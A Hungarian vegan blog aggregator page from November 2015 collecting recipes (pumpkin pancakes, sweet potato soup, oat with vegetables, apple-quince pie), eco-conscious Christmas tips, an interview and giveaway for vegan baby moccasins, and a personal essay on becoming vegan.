2015. november 25. Zöld Avocado
sütőtökös amerikai palacsinta fahéjas öntettel (vegán) A palacsinta amerikában főként reggeli fogásként szerepel az otthonokban. Nálunk, magyaroknál inkább főétel egy tartalmas leves után ebédre a családnak, míg az éttermekben desszertként találkozhatunk velük az étlapon. Vannak kultúrák a Világban, ahol pedig inkább vacsorára falják a különböző palacsintákat. Ez röviden azt jelenti, hogy a palacsintát a nap 24 órájában képesek vagyunk megenni! :-) Nagyon sokféle receptet lehet találni a neten palacsinta ügyben. A sütőtökös palacsinta gondolatát sem én találtam fel, de mivel az egyik kedvenc téli tökfélémről van szó, nem maradhatott ki, mint fő palacsinta alapanyag! ;-) Hiszen jó palacsintát bárhol, bármikor, bármekkora mennyiségben képes vagyok megenni... főleg, ha még vegán is! Mert ilyenkor nem csak a szám, de a testem is örül neki! ;-) Olyan receptet szerettem volna, ami a leginkább gyomorbarát, és a legtöbb ember számára fogyasztható. Így egy laktózmentes, tojásmentes és vegán változatot választottam, mely a China Study Cookbook - ban, avagy a Kína tanulmányhoz tartozó szakácskönyvben található recepten alapszik. (A Kína tanulmány elolvasása volt az utolsó löket a vegetáriánussá válásom kalandos útján. Ajánlom mindenki figyelmébe!) Készítettem hozzá egy fahéjas öntetet is, ami tökéletesen kiegészíti ezt a télies hangulatú finomságot. sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) Természetesen gluténmentes liszttel is elkészíthetitek. Legközelebb gesztenyeliszttel fogom kipróbálni ezt a receptet. Hogy miért gesztenyeliszt? Egyrészt mert van itthon, és ritkán használom, pedig sok jó tulajdonsága van. Másrészt, mert valami teltebb liszttel tudom elképzelni ezt a palcsintát, és GM zabliszttel már készítettem egy másik, banán palacsintát korábban a Zöld Avocado vegetáriánus gasztroblogon. Azonban, ha gesztenyeliszttel dolgozunk, igazítsuk hozzá a többi hozzávalót is, mert a gesztenyeliszt nagy nedvszívó képességgel rendelkezik, így az általam megadott folyadékmennyiség gesztenyeliszttel már nem biztos, hogy ugyanazt az eredményt fogja produkálni. sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) HOZZÁVALÓK (kb. 35 db): - 300 g teljeskiőrlésű tönkölybúza liszt - 1 nagy bögre sütőtök püré (párolt sütőtök húsa) - 5 ek maple- vagy agave- vagy datolya szirup - 1/2 tk Himalája só - téli fűszerkeverék: 1/2 kk őrölt szegfűszeg, 1/2 tk őrölt szerecsendió, 1 tk őrölt fahéj - 2 ek őrölt lenmag 6 ek vízben elkeverve (2 db vegán tojásnak felel meg) - 30 ml tetszés szerinti növényi tej (pl.: mogyorótej, mandulatej) - 1/2 tk szódabikarbóna - öntethez: natúr (szója) joghurt + őrölt fahéj + tetszés szerinti édesítőszer - sütéshez: kókuszolaj sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS A sütőtököt meghámozva, lekockázva, puhára pároljuk kb. 25 perc alatt. Majd összenyomjuk villával, vagy turmixgéppel, hogy sütőtök püré legyen belőle. (Meg is süthetjük a tököt sütőben, de nálam ez nem vált be, mert megettem az aranybarnára sütött tököt, mielőtt a palacsintába került volna. Nagyon szeretem. ;-) ) A frissen darált lenmagot elkeverjük a háromszoros mennyiségű vízben, és félretesszük min. 15 percre. Ezidő alatt elkezd kocsonyásodni, és így fogja a tojást helyettesíteni a vegán édességünkben. A száraz és nedves hozzávalókat összekeverjük külön-külön egy-egy keverő tálban. Majd összeborítjuk, és hozzáadjuk a sütőtök pépet. Alaposan összekeverjük, hogy ne maradjanak lisztcsomók benne. Egy palacsintasütőben kevés kókuszolajon, közepes lángon, szépen lassan, kisütögetjük az amerikai palacsinta méretű (kb. a tenyerünk közepe) palacsintákat. Tálalhatjuk például házi lekvárral, maple sziruppal, pekán dió morzsával, banán karikákkal stb. Én fahéjjal és agave sziruppal kikivert natúr szója joghurtot készítettem mellé. Tökéletes őszi/téli reggeli, de akár az iskolai uzsonnás táskába is elfér. Sőt! A munkahelyre is magunkkal vihetjük, mert melegítés nélkül, szobahőmérsékleten is bátran fogyasztható. Finom és tápláló útravaló! :-) sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) Táplálkozz, ne csak étkezz! Megjegyzés: Azt észrevettétek már, hogy ha a boltban megvásárolt sütőtököt pár napig szobahőmérsékleten tároljátok ( mielőtt felhasználnátok) , akkor édesebb lesz? Próbáljátok ki! sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán)
Készülj a karácsonyra - légy karácsonykor is tudatos:)
2015. november 24. Élj harmóniában
Karácsonyi készülődésKö zeledik a december, a karácsonyi készülődés ideje. A karácsony, szokták mondani a szeretet és béke ünnepe. Sajnos a mai társadalomban ez az időszak sokak számára nem annyira békéről, megnyugvásról, szeretetről szól, hanem túlvállalásról, pörgésről, sok kiadásról, aggodalmakról, feszültségről. Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet. Hagyj időt magadnak a kikapcsolódásra, mert a legszebb ajándék, amit adhatsz a családodnak, barátaidnak, az a személyes társaságod, az hogy kedves, kipihent, nyugodt, türelmes, toleráns és szeretetteljes vagy. Ha visszaemlékszünk az előző évek karácsonyaira, arra általában senki nem emlékszik milyen volt a menü, vagy mi volt az ajándék, esetleg a csomagolás vagy éppen a fa díszítése, de ha karácsonykor feszültség van, esetleg veszekedés, arra akár évekig is mindenki visszaemlékszik. Ne engedd, hogy a karácsonyi készülődés a külsőségekről szóljon. A karácsony olyan időszak, amikor lehetőségünk van kicsit befelé figyelni, egyensúlyra törekedni és ilyenkor fókuszba kerülnek az emberi kapcsolatok, a szeretet. A karácsony előtti időszakban sokan vállalják túl magukat, akár túl sok tenni való elvégzésével vagy a túl nagy anyagi terhek felvállalásával. Sok sok éves statisztikai támasztja alá, i lyenkor többszöröse mennyiségű élelmiszert és nagyon sok felesleges használati- és dísztárgyat vásárolunk, továbbá sokkal több vizet, áramot és gázt használunk. Karácsonykor még a tudatos, környezetbarát emberek is könnyelműek, könnyebben pazarolnak vagy esetleg kicsit meggondolatlanabbul költekeznek. Légy tudatos karácsonykor is:) Annak érdekében, hogy a karácsonyi készülődés gördülékenyen menjen néhány praktikus tanáccsal szeretnénk a segítségetekre lenni. Ez a néhány tanács segít, hogy az ünnepi időszakot tudatosabban, kevesebb energia és pénz elhasználásával tudjátok megélni. Tervezz meg mindent alaposan előre. Írd össze a feladatokat, vedd sorra mit, mikor, hol és mennyiért szeretnél beszerezni. Azokat a feladatokat amiket lehet, próbáld átadni valakinek a családban. A többi feladatot, vásárlást nézd meg hogyan tudod leghatékonyabban összekötni - pl. egy adott helyen vásárolsz több dolgot. Ne kapkodj, ne rohanj. A rohanással nem nyerhetsz túl sok időt, viszonyt sok lesz az idegesség miatt elvesztegetett energia. Fáradtan, kimerülten kevésbé tudsz koncentrálni és könnyebben leszel türelmetlen, ingerlékeny. A feladatokat és a programokat úgy oszd be, hogy maradjon időd regenerálódni, kikapcsolódni. Tervezd meg azt is, hogyan fogsz feltöltődni, kikapcsolódni a karácsonyi készülődés időszakában. Ne ajándékozz felesleges dolgokat, gondold át jól, valóban szükség van-e arra, amit ajándéknak szánnál. Ajándékozhattok baráti körben akár otthon megunt tárgyakat, vagy saját kezűleg készített meglepetést is. Utóbbi kevesebbe kerül és sokkal személyesebb is. A jándék vásárlásnál, részesítsd előnyben az élmény ajándékokat. Számos statisztika kimutatta, hogy az emberek jobban örülnek az élményeknek, mint a tárgyaknak. Ajándékozz utazást, színházjegyet, jóga bérlet, masszázs, etc. Amennyiben valamilyen terméket szeretnél ajándékozni, elsődlegesen olyan terméket vásárolj, ami nem terheli a környezet, és akinek adod, annak az egészségre nem káros. Kerüld el a csomagolást. Ez az egyik legnagyobb pazarlás karácsonykor. Ha csomagolni szeretnéd az ajándékot, válassz natúr papírszatyrot, újságpapírt vagy újrahasznosított papírból készült csomagolóanyagokat. Ú j díszek vásárlása helyett, megunt díszeidet cserélgesd barátaiddal és készíts új díszeket természetes alapanyagokból - papírból, fából, termésekből, textíliából, otthoni újrahasznosítható dolgokból, pattogatott kukoricából, etc. Karácsonyi világításnál alkalmazz hagyományos megoldásként gyertyákat. A karácsonyi menüt friss, egészséges, vegyszermentes (bio) alapanyagokból készítsd el és annyit ételt főzz, amennyit jólesően el is fogyaszt a család. Karácsonykor sajnos nagyon sokan túl eszik magukat és januárban az évet az orvosnál kezdik. Törekedj a mértéktartó étkezésre és a minőségi ételek fogyasztására, hogy jól indulhasson az éved:) Állíts cserepes fenyőt - vagy ma már papír fenyőket is tudsz beszerezni. Kerüld el a műanyagfenyőket és a kivágott fákat is, mert sajnos egyik megoldás sem környezetbarát. Tölts sok időt szeretteiddel, békében, nyugalomban. Szervezzetek közös programot, sétáljatok a szabadban, gyönyörködjetek a természetben vagy menjetek korcsolyázni, társasjátékozzatok. A lényeg, hogy együtt legyetek:) Mindenkinek boldog, békés, szeretetteljes ünnepeket kívánok:)
Batáta krémleves
Édesburgonyáról már írtam néhány bejegyzéssel korábban. Itt, Londonban, leginkább csak a narancssárga színű egyedeket árulják. Bő egy kilót kemény 1 fontért. :) Ha krémlevest készítünk, nem csak a színe emlékeztet a sütőtök krémlevesre, de az íze is teljesen, akár csak ha sütőben megsütjük. Különben Fülöp-szigetek, India és az afrikai országokban terjedt el leginkább. Anglia nagy boltjainak fagyasztós hűtőiben olajban kisütött édesburgonyát is lehet kapni. Hasonlóan a sült krumplihoz, csak batátával készítik. Még nem vettem, de más úton már kóstoltam, finom, édeskés íze van. Ez viszont nem hasonlít a gyors éttermek sült krumplijaira. Villámgyorsan elkészíthető krémleves recept következik.
A recept:
Hozzávalók:
- 1-2 db édesburgonya/batáta
- víz
- só
- 3-4 gerezd fokhagyma
- növényi tej (szójatejet használtam)
Elkészítés:
Az édesburgonyákat meghámozzuk, feldaraboljuk és annyi vízzel, hogy ellepje, felöntjük, sóval feltesszük főzni. A fokhagymákat megpucoljuk és szintén hozzáadjuk. Fedővel lefedett edényben rövid idő alatt puhára főzzük. A zöldséget a turmixgépbe kanalazzuk, a levét megtartjuk. Egy kevés növényi tejjel (kb. 1,5 dl) turmixolás közben felöntjük, amikor selymesre turmixolódott, fokozatosan hozzáadjuk a zöldség levét is. A turmixolás után átöntjük a fazékba, melegítjük egy kicsit és tálalhatjuk is. Ha van, csepegtethetünk a tetejére tökmag olajat (teljesen sütőtök-krémleves "feeling" lesz tőle), de pirított hagymakarikákkal is megszórhatjuk. Önmagában fogyasztva is kellemes meleg levesnek ígérkezik. (Ahogy a neve is jelzi, édesebb ízre készüljünk fel.)
Tender Toes baba mokaszin nyereményjáték
2015. november 23. Zizi kalandjai
Fotó: Blueberry Baby
Erikát az internetnek köszönhetően ismertem meg. Egyből beleszerettem az általa készülő aprócska “cipőcskékbe”, mokaszinokba. Cuki fazonok kislányoknak és kisfiúknak egyaránt, szivárvány színekben, környezet- és állatbarát anyagból.
Honnan jött az ötlet, hogy ilyen cuki mokaszinokat kezdjél készíteni?
Jó pár éve fedeztem fel magamban, hogy nagyon szeretek kézműveskedni, fabrikálni, alkotni... A sort az esküvőmre magam fűzött ékszer szett kezdte meg, onnantól aztán pedig már nem volt megállás, ehhez jött még a különböző kézzel készült karácsonyfa díszek varrása (ez a kedvenc időszakom), majd az építkezés kapcsán a bútorok felújítása, festése, “öregbítése”, a lakás csinosítása, első gyermekünk szobájának dekorálása, vízfesték képek készítése. Az igazi áttörést aztán a mokaszinok hozták meg, melyből az első párat Zalán keresztfiamnak varrtam még a nyár folyamán. Nézelődtem az interneten, hogy mivel is lephetném meg, és ekkor akadtam rá a Pinteresten egy kis mokaszin képére, a hozzá tartozó leírással együtt. Először egy régi műbőr nadrágot “áldoztam” be, gondolván nem rohanok egyből a méterárú boltba. Elégedett voltam az eredménnyel, noha ennek még minden centijét kézzel varrtam, barátnőmnek is tetszett, így elkezdtem megfelelő anyag után kutatni.
Volt-e “előképzettséged” a munkához?
A varrást hobbi szinten művelem, nem tanultam soha. A házban a függönyök, a gyerekszobában az ágyszoknyát, rácsvédőt, zászló girlandot mind magam varrtam internetes útmutatók alapján. Habár a családban anyai nagymamám, keresztanyám, apai nagynéném mind “hivatásos” varrónők voltak, apai nagyapám pedig cipészmester, nekem mégsem volt közöm egyik szakmához sem. Eredeti végzettségemet a Vitéz János Római Katolikus Főiskolán szereztem 2004-ben művelődésszervező (andragógia)-kommunikáció szakon, illetve jelenleg végzős hallgatója vagyok a Károli Gáspár Református Egyetem Pszichológiai Intézet, klinikai pszichológia szakának.
Ez csak hobbi vagy már kinőtte magát vállalkozássá?
Hobbinak indult, majd miután Erik fiúnknak is varrtam egy-egy mokaszint, illetve addigra már Zalán keresztfiam is több puhatalpúval rendelkezett, férjem és barátnőm rákérdeztek – egymástól függetlenül, de szinte egy időben, mintha összebeszéltek volna... – hogy nem lenne-e kedvem eladásra is varrni belőlük, mert biztos másoknak is nagyon tetszene, hiszen ezt eddig csak Amerikában ismerik, itthon egyáltalán nem elterjedt ez a fajta kis puhatalpú. Először ezt a kérést is elhárítottam, mint az összes többi fenti hobbim üzletszerű végzését, de igazából elültették a bogarat a fülemben... Így aztán a nyár folyamán először még nem nyilvánosan, de kitaláltam a márkanevet, létrehoztam egy Facebook rajongói oldalt, vettem anyagokat, utána néztem a számlázási háttérnek, szóval előkészítettem a terepet és gyűjtöttem a bátorságot – ez a lényeg.
Milyen anyagból készülnek a kiscipők?
Nagyon fontos szerepet tölt be az életemben az állatvédelem, az állatok védelme, melyben tevőlegesen is részt veszek, legyen szó kutyák ideiglenes gazdikhoz szállításáról, kutya út mellől való összeszedéséről, munkahelyemen lévő macskák ivartalanításáról, több szervezet havi rendszeres anyagi támogatásáról, vagy kutyák új családtagként való befogadásáról az otthonunkba (Kaktusz, Mogyoró és Mandula kutyánkat utcáról fogadtuk be, Baldót a fajtamentéstől). Férjem legtöbbször követőm is ebben, ami nagyon sokat jelent, hiszen támogatása nélkül sok alkalommal egymagam egyszerűen kevés lettem volna. Sajnos egyéb lehetőségeim korlátozottak, így az állatok védelmében való felszólalásra jobbára csak internetes felületen van módom (petíciók, tiltakozások). Ebből kifolyólag, morális okokból döntöttem aztán a vegetáriánus lét mellett is, ami számomra nem csak egy étkezési szokás, hanem egy hitvallás, egy életmód, egy élni és élni hagyni életfilozófia.
Miért választottad a textilbőrt?
Így nem is volt kérdés, hogy a kis mokaszinokat semmiképpen sem fogom valódi bőrből varrni, nem kívánok ilyen módon sem részt venni az állatok kizsákmányolásában, embertelen tartási és elpusztítási módjában. Utána néztem, hogy milyen alternatívák vannak és nagyon könnyen és gyorsan rátaláltam a textilbőrre, ami a műbőr egy speciális változata (PU – polyurethane – fedésű műbőr puha, bőrhöz hasonló fogású, nagy kopásállósággal rendelkező anyag. A különböző kárpitos műbőrök mellett gyakran használnak tisztán PU fedésű műbőröket egészségügyi és cipőipari célokra, ugyanis ezeket a műbőröket egyszerre lehet vízzáróvá és légáteresztővé tenni. Ezt a tulajdonságot szokták “lélegző”-nek is hívni. A hazánkban forgalomban lévő, PU kárpitos műbőrök – népszerű nevén “textilbőrök.”). Bevallom eleinte azért aggódtam a fogadtatását tekintve, hiszen mélyen gyökerezik az emberekben a bőr cipők iránti kötődés, és még néha most is vannak olyanok, akik nem ismerik a textilbőrt , csak azt tudják, hogy nem VALÓDI bőr. De szerencsére azért manapság már olyan jó minőségű mű és textilbőröket gyártanak, hogyha a legtöbben egyelőre még nem is tudatosan, de támogatják az erőszak és szenvedésmentes anyagok használatát. Bízom benne, hogy lassan-lassan, de egyre többen fogják etikai okokból is ezeket a vegán, textilbőröket, vagy egyéb alternatívákat preferálni, illetve hál Istennek egyre elterjedtebb hazánkban is a vegán/vegetáriánus szemlélet, ezeket a közösségek is egyre több tagot számlálnak, így növekszik ennek a tábornak is a létszáma, ezzel pedig egyre eredményesebben tudják hallatni a hangjukat az állatok védelmében, és egyéb lehetőségek megismertetésében.
Kiknek ajánlod a mokaszint (pl. kúszó-mászó babáknak, totyogóknak)?
Egészen születéstől, másfél-két éves, tehát 0-24 hónapos korig, benti- vagy kocsicipőnek, kúszó-mászónak és éppen elindulóknak, totyogóknak egyaránt. Mivel ilyen pici korban a babák lába szinte hónapról hónapra növekszik, ezért igazán praktikus és egyben költséghatékony megoldás is egy szép kis kézzel készült Tender Toes mokaszin, mely biztosítja az ilyenkor ortopéd orvosok által is javasolt mezítlábas érzést és a talp izomzatának egészséges fejlődését.
Hol lehet találkozni a termékeiddel?
A Facebook oldalamon, ahol jeleztem is, hogy karácsony közeledtével és születendő kisfiamra való tekintettel 2015. december 1-ig tudok rendeléseket felvenni, amelyeket legkésőbb december 15-én postázok, hogy garantáltan megérkezzen az ünnepekre, a fa alá a kis mokaszin. Ezenkívül december 5-én szombaton kint leszek a Pici Piacon, ahova sok szeretettel várok mindenkit.
Erika elérhető az alábbi linken:
– Tender Toes Baby Moccasins Facebook oldal
*****
NYEREMÉNYJÁTÉK!
Nyeremény : egy nyertes választhat egy pár Tender Toes lányos vagy fiús, bélelt mokaszint (hajpánttal vagy csokornyakkendővel) a kívánt méretben és színösszeállításban.
Írjátok meg a bejegyzés alá kommentben, hogy nektek milyen szín összeállítású mokaszin tetszene! Kérem, hogy az alábbi formula minden pontját töltsétek ki! Vagyis a lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulába klikkeljetek a szürke I commented! kockára, csak így érvényes a kommentetek. Ezenkívül lájkolni kell a Tender Toes és a Zizi kalandjai Facebook oldalakat. Ha még nem vagy ha már lájkoltátok a Facebook oldalakat, mindkét esetben klikk a kék Visit Us-ra a lájk után.
a Rafflecopter giveaway
Szabályok : 2015. november 26-ig lehet játszani. Eredményhirdetés 2015. november 27-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt Erika postázza magyarországi címre.
Brokkolis-répás zab
Nem csak lovaknak ajánlott a zab, sőt, ha jót akarunk magunknak, étrendünkbe iktatjuk minél gyakrabban. Köretként de főételként is fogyaszthatjuk a következő ételt. A zabot (egész szemű zabot) nem nagyon látom gasztro-posztokban, mint főétel, vagy köret, pedig amellett, hogy gluténmentes (ez aztán tényleg, nem úgy, mint a belőle készült zabpehely, ami "keveredhet" gluténnel, így aztán nem feltétlen alkalmas gluténmentes diétába), nagyon egészséges is. Mondhatni szupertáplálék, mivel jóformán minden - szervezetünk számára szükséges - tápanyagot tartalmaz. B és E vitamint tartalma mellett jelentős Magnézium, Kálium, Kalcium, Foszfor és Vas tartalma is. Fehérjében gazdag. Emésztési panaszok esetén különösen ajánlott. Emellett segíti az idegrendszer működését, regenerálja az idegeket. Fogyasztása telítettségérzetet ad, tehát fogyókúrázók alaptápláléka lehet. Alacsony glikémiás indexe miatt cukorbetegek is bátran fogyaszthatják. Vérnyomás és vérkoleszterin-szint csökkentő hatása is említésre méltó. Bizonyos béta-glükán tartalma meggátolja a szervezetben lévő fertőzések továbbterjedését. Nagy mennyiségű fito-vegyületei pedig a rák, főképp a mellrák kialakulását, terjedését gátolják. A következő recept nagyon egyszerűen elkészíthető.
A recept:
Hozzávalók:
- 1 bögrényi zab
- víz
- só és/vagy ételízesítő
- 1 kisebb fej brokkoli
- 3 szál répa
- 2-3 gerezd fokhagyma
Elkészítés:
Előző este mossuk meg és áztassuk be a zabot egy éjszakára annyi vízben, amennyi jól ellepi. Másnap adjunk hozzá még vizet majd főzzük puhára. (Persze ha nem tudjuk előáztatni, hosszabb főzési idővel is elkészíthető. Vagy ha reggel áztatjuk be és néhány óra múlva főzzük, az is megfelelő.) Míg fő, a répát pucoljuk meg, karikázzuk fel és kevés vízen fokhagymával és sóval (vagy ételízesítővel) pároljuk meg. A brokkolit mossuk át, szedjük rózsáira, szintén kevés vízen sóval (vagy ételízesítővel) pároljuk meg. Amikor megfőtt, puhák a zabszemek, a zöldségekkel egyszerűen összekeverjük és kész is a tápláló, finom étel. Főételként fogyasztottuk, de köretként is megállja a helyét. Ha nem vagyunk gluténmentes diétán, sörélesztő-pehellyel is megszórhatjuk.
Vegán, cukormentes almás-birsalmás pite-torta
2015. november 18. Mindennapi ételeink
Ismét egy édesség receptjét hoztam, talán karácsony előtt hasznos lehet. Hozzávalók: 30 dkg finomliszt 20 dkg teljes kiőrlésű liszt 1/2 csomag foszfátmentes sütőpor 1 dl olvasztott kókuszzsír 10 dkg eritrit kb. 1-2 dl víz -- 1 kg alma 1/2 kg birsalma 10 dkg eritrit 1 bio citrom héja 1 vaníliás cukor vagy 2 tk. vaníliapor 1 ek. morzsa Elkészítés: A liszteket és az eritritet összeöntjük, hozzáadjuk a sütőport. Kimérjük a kókuszzsírt és beleöntjük. Majd annyi vízzel hígítjuk, hogy rugalmas pitetésztát kapjunk. Félretesszük, kissé pihenni, eközben elkészítjük a tölteléket: az almákat meghámozzuk és megpároljuk. Egy olajozott, lisztezett pite formájú tepsibe belesimítjuk a tészta felét, erre 1 ek. morzsát szórunk rá és erre rákenjük az almás tölteléket, majd befedjük a tészta másik felével. Vízzel hígított lekvárral kenjük meg, ez szép színt ad neki (tojássárga helyett), és még csillogó lesz. Megszórjuk eritrittel. Közepes lángon, kb. 30 perc alatt kisütjük.
Miért lettem vegán?
2015. november 18. Vegán lettem
A vegán életforma logikájának mibenlétét egy kedves ismerősöm kérdezte meg facebookon. Leírtam azt, hogy én miért lettem vegán. Így született a “Vegán Lettem” blog ötlete és ez a bejegyzés.
Mikor lettem vegán?
2008 óta vagyok vegetáriánus és 2015 augusztus 1-je óta 100%-osan étrendi vegán. Tehát már semmilyen állati eredetű dolgot nem eszek, plusz semmilyen élelmiszert amiben akár 0,1% tejsavópor, tejpor, tejfehérje vagy tej-tojásszármazék van. Ezt egy kedves barátom úgy hívja, hogy: 0.0 (nulla pont nulla) vegán. Azért hívjuk ezt csak étrendi vegánnak, mert még nem használódott el a bőrcipőm és a bőrövem, de amint ez megtörténik, eszem ágában nem lesz új bőr, gyapjú illetve tollal tömött dolgokat vásárolni. Írtam egy bejegyzést korábban a vegán életmódról, amiben számos hasznos információt megtalálsz a veganizmusról. Na de miért lettem vegán?
Mi indított el a vegán életmód felé vezető úton?
Nem leszek népszerű a vegánok között, de mégis muszáj vagyok először kicsit kilépve a személyes meggyőződéseimből és helyzetemből, egy globálisabb, nem vegán megközelítéssel kezelni a dolgot, hogy a mindenevő társaink is közelebb érezzék magukat a témához. És, hogy miért nem leszek szimpatikus a vegánok körében? Mert szerintem nem a hús és tejtermékek fogyasztásával van alapvetően gond, hanem azzal a mértéktelen hús és tejtermék fogyasztással, amit az ember gyakorol, és ami azokhoz a finoman szólva is embertelen körülményekhez vezet, ami a tej és tojás üzemekben, valamint vágóhidakon ipari formában folyik. A több ezer (ipari szinten feleslegesnek tekintett) napos kiskakas élve ledarálásával, a tehenek tejgépekké alakításával (annak mindenféle kémiai, a borjút az anyától elválasztó és egyéb embertelen tulajdonságaival), a tojók ipari gépekké alakításával és tartásával, stb.stb.stb., valamint úgy alapvetően a vágóhidakon és a halal vágóhídakon működő ipari mészárlással.
Azzal van itt gond részemről, hogy az emberi természet és szokások miatt, olyan dolgokat alakítottunk ki és veszünk természetesnek, ami természetellenes. Mert azt beismerheti mindenki mindenféle eszmecsere nélkül, hogy a modern ipari állattartásban semmilyen természetes dolog nincs annak ellenére, hogy élőlényekkel végezzük. Továbbá cukrozhatjuk a taknyot olyan gondolatokkal, hogy de a tehenet azért háziasítottuk, hogy húst és tejet adjon, attól az még egy élő és érző lény. Lehetne velük máshogy is! Mondjuk úgy, ahogy elvárhatóan egy tanyán állnak hozzájuk. Egy kicsit máshogy átfordítva, túl sok érző és élőlény folyamatos szenvedését és halálát hozzuk létre azzal, ahogyan élünk. Én ezt látom problémának.
Azonban annak ellenére, hogy étrendi vegán vagyok a megoldást nem a vegánságban látom, hanem a tudatosabb, környezettudatosabb, mértéktartó és együttérzőbb életvitelben minden ember részéről.
Amibe alkalomadtán, sok embertársunk által vélt igények szerint férjen bele a hús és tejtermék fogyasztása. De ahogy mondjuk régen. Heti egy - két alkalommal.
Etikai és morális megközelítésem a vegán életmódról
Nálam ott defektes a rendszer, hogy nem értek egyet az ember felsőbbrendűségével.
Nem értek egyet azzal, hogy mindent megtehetünk és meg is teszünk, mert úgy alakult ki, hogy mi vagyunk azok akik megtehetjük.
Mert ezt dobta gép, vagy hívjuk evolúciónak. Kicsit finomítva a problémámon, azt a helyzetet, hogy más élőlények életének alakulása felett ilyen hatalmunk van, egyszerűen és természetellenesen kihasználjuk azon való munkálkodás helyett, hogy minden élőlény normális keretek között élhessen ezen a bolygón. Vágó élőlényeket hozunk létre pl. azért, hogy enni tudjunk. Számomra ez teljesen abszurd. Főleg ha arra gondolok, hogy arra a tápanyagra amit a vágóállat ad, nincs is szüksége a szervezetünknek, pontosabban be tudjuk vinni tisztán növényi forrásból. Totálisan értelmetlen szenvedést és halált okozunk azért, hogy élvezhessünk egy tál ételt. Ráadásul sokkal több ételnek valót esznek meg ezek az állatok, mint amennyit adnak. Ergó sokkal több rászoruló embert tudnánk étkeztetni, ha nem az állatoknak termelnénk a takarmányt. Érdekes dolog ez nem? Emellett komoly viták folynak arról, hogy az húsevő az ember vagy sem.
Arra az általam is művelt ellentmondásra pedig már csak zárójelben világítok rá, hogy állatbarátnak hívtam magam és hangoztattam, hogy mennyire szeretem az állatokat, majd egyiket-másikat megettem. Komoly értelmezési és kulturális paradoxon.
Egészség és étkezési oldalról való tapasztalataim a vegán életmódról
Mielőtt vegetáriánus lettem olyan agresszív allergiával álltam már szemben 25 évesen, amit sem gyógyszerek, sem vitaminok nem tudtak enyhíteni tavaszonként, és ami szépen lassan elkezdett átfordulni asztmává. Az orvosok szerint ez lett volna a menetrend. Aztán vegetáriánus lettem egy 1 éves átállással, és ami közel 10 év alatt kifejlődött bennem allergia, az 3 év alatt nyomtalanul eltűnt. Emellett gyermekkoromtól kezdve komoly hajlamom volt ekcémás betegségekre is, ami ugyancsak elmúlt. Értelemszerűen semmilyen tárgyi bizonyíték nincs arra, hogy ez a vegetáriánus életmód miatt történt, de felettébb furcsa az egybeesés. Ennél egyébként meghökkentőbb gyógyulással kapcsolatos (egészen súlyos betegségek esetében) történeteket is hallottam már vegán ismerősöktől, de mindenki azt mond amit akar alapon azzal nem foglalkozom.
Vegán életmódomat illetően, ezeken kívül is egészen elképesztő tapasztalataim vannak.
Körülbelül egy hónap vegán étrend után érezhetően, és mérhetően nőtt mind a fizikai mind a mentális teljesítőképességem.
Kerékpáron alapvetően 100km távolság felett érzem jól magam, szeretem a hosszú országúti túrákat. Amióta vegán vagyok sokkal később fáradok ki, sokkal kevesebb étellel. Egy bő vegán reggelivel 80-100km-t letekerek, ez egy a szüleink által energiagazdagnak titulált kiadós rántottától ez 40-60km volt max. Elmentem testépítő edzésre kíváncsiságból, és amellett, hogy gyorsan fejlődnek az izmaim, olyan energia jelenlétet tapasztalok amit sem vegetáriánusként sem mindenevőként nem. Munka vagy tanulás frontján mindig gondom volt az esti fejhasználattal. Általában hajnalban kelek 4-5 között és este 7-8 körül már használhatatlan voltam. Ez is megszűnt. Vannak rosszabb napjaim, de az esetek többségében ébredéstől fekvésig használható és bevethető vagyok fejben is.
A vegán emberek testi, lelki és szellemi állapotát végignézve, a vegán testépítők és egyéb vegán élsportolók történeteit és életvitelét látva, valamint a témával kapcsolatos megannyi kutatás eredményét olvasva arra a következtetésre jutottam, hogy:
Nagyszüleink és szüleink nem szándékos félrevezetése és az élelmiszeripar konkrét hazugsága csupán, hogy a húsra, tejre, tojásra szükségünk van.
Semmi ilyesmire nincs szüksége a szervezetünknek, illetve növényi úton minden pótolható. Emellett megdöbbentően kevés fehérjére van szüksége egy felnőtt embernek, akár edzés mellett is. Erről a későbbiekben írok egy bejegyzést. Ugyanakkor azt is elhiszem, hogy mértéktartó és tudatos húsfogyasztás (max heti 1-2 alkalom) nem feltétlenül káros és nem lesz tőle baja az embernek ha elég rostos ételt eszik, és sokat mozog, de semmi szükségünk az állati eredetű fehérjére konkrétan. “Akkor miért okoznék szenvedést és halált?” – tettem fel a kérdést magamnak egy idő után.
Emellett olvastam rengeteg pro-kontra kutatási eredményt azokról a növekedési hormonokról, antibiotikumokról és egyéb gyógyszerekről amiket az állatok kapnak a stressz okozta betegségek, valamint a vágósúly mielőbbi elérésének érdekében, és amik bomlásanyagait bevisszük az állati eredetű ételek fogyasztásával. Az a félelmetes, hogy ezek jelenléte nem vita tárgya, inkább azon megy az adok-kapok, hogy ez mennyire egészségtelen az emberre nézve és milyen élettani hatásai lehetnek hosszútávon. Továbbá az élőlények a folyamatos stresszhatás alatt mérgeket és félelmi anyagokat választanak ki, melyek a húsban és tejtermékekben maradnak ugyancsak, és melyek szervezetünkre és idegrendszerünkre okozott hatásai károsak. A későbbiekben erről is írok egy átfogó bejegyzést.
Tehát miért lettem vegán?
A fizikai és mentális tapasztalataimat egybevetve azzal, hogy nem szeretnék semmilyen formában és módon hozzájárulni egy állat levágásához vagy kizsákmányolásához, vezetett oda, hogy vegán lettem. Úgy éreztem, hogy én egy dolgot tudok tenni annak érdekében, hogy megakadályozzam állatok tömeges lemészárlását és kizsákmányolását, az pedig az ha nem támogatom a modern ipari állattartást, és mindazt a borzalmat ami azzal jár. Továbbá úgy éreztem, hogy semmi értelme nincs támogatnom a mindenki megnyugtatására etikusnak elnevezett, valamint még háztáji állattartást sem. A szenvedés megteremtése és az élet elvétele semmilyen formában nem etikus és nem semmilyen formában nem elfogadható részemről.
